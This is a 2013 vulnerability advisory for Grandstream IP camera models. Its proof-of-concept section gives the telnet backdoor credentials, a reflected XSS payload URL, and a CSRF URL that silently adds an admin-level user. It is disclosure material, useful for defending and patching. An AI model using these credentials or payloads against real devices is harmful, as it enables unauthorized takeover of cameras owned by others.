===============================================================================
GRANDSTREAM
====================================================================
===============================================================================

1.Advisory Information
Title: Grandstream Series Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013

2.Vulnerability Description
The following vulnerability has been found in these devices:
-CVE-2013-3542. Backdoor in Telnet Protocol(CAPEC-443)
-CVE-2013-3962. Cross Site Scripting(CWE-79)
-CVE-2013-3963. Cross Site Request Forgery(CWE-352) and Clickjacking(Capec-103)

3.Affected Products
The following product are affected: GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV3615W/P, GXV3651FHD, GXV3662HD, GXV3615WP_HD and GXV3500.
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963.
It’s possible others models are affected but they were not checked.

4.PoC
4.1.Backdoor in Telnet Protocol
CVE-2013-3542, Backdoor in Telnet Protocol
You should connect via telnet protocol to any camera affected (it's open by default).
After all you should be introduce the magic string “ !#/ ” as Username and as Password.
You will get the admin panel setting menu. If you type "help", the following commands are shown:
=======================================================
help, quit, status, restart, restore, upgrade, tty_test
=======================================================
 @@@ restore (Reset settings to factory default)

The attacker can take the device control, so it's make this devices very vulnerables.

4.2.Cross Site Scripting (XSS)
CVE-2013-3962, Cross Site Scripting non-persistent.
_____________________________________________________________________________
http://xx.xx.xx.xx/<script>alert(123)</script>
_____________________________________________________________________________

4.3.Cross Site Request Forgery (CSRF)
CVE-2013-3963, CSRF via GET method.
These cameras use a web interface which is prone to CSRF vulnerabilities. 
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
You should introduce the following URL to replicate the attack.
_____________________________________________________________________________
http://xx.xx.xx.xx/goform/usermanage?cmd=add&user.name=test3&user.password=test3&user.level=0
_____________________________________________________________________________

5.Credits
-CVE-2013-3542, CVE-2013-3962 and CVE-2013-3963 were discovered by Jonás Ropero Castillo.

6.Report Timeline
-2013-05-31: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3542. 
-2013-05-31: Grandstream team reports to the technical support to analyze the vulnerability.
-2013-06-11: Students opens a ticket in order to notify the Grandstream Customer Support of the CVE-2013-3962 and CVE-2013-3963 vulnerabilities.